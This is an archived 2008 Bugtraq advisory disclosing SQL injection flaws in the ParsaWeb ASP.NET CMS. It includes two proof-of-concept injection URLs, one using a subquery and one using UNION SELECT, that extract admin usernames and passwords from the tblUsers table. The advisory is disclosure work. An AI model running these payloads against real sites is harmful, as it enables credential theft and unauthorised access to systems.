lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sun, 28 Sep 2008 16:01:03 +0330 From: admin@...report.ir To: bugtraq@...urityfocus.com Subject: ParsaWeb CMS SQL Injection ########################## www.BugReport.ir ####################################### # # AmnPardaz Security Research Team # # Title: ParsaWeb CMS SQL Injection # Vendor: http://www.parsagostar.com # Demo: http://cms.parsagostar.com/ # Exploit: Available # Impact: High # Fix: N/A # Original advisory: http://www.bugreport.ir/index_53.htm ################################################################################### #################### 1. Description: #################### ParsaWeb is a commercial ASP.NET website and content management system. #################### 2. Vulnerabilities: #################### Input passed to the "id" parameter in default.aspx and txtSearch in search section are not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. #################### 3. Exploits/POCs: #################### http://www.example.com/?page=page&id=-164 or 1=(select top 1 user_pass from tblUsers where user_name = 'admin') http://www.example.com/?page=Search Search:AmnPardaz%') union ALL select '1',user_name+':'+user_pass,'3','4','5','6','7','8','9','10',11 from tblUsers-- #################### 4. Solution: #################### Edit the source code to ensure that inputs are properly sanitized. #################### 5. Credit: #################### AmnPardaz Security Research & Penetration Testing Group Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.com
Powered by blists - more mailing lists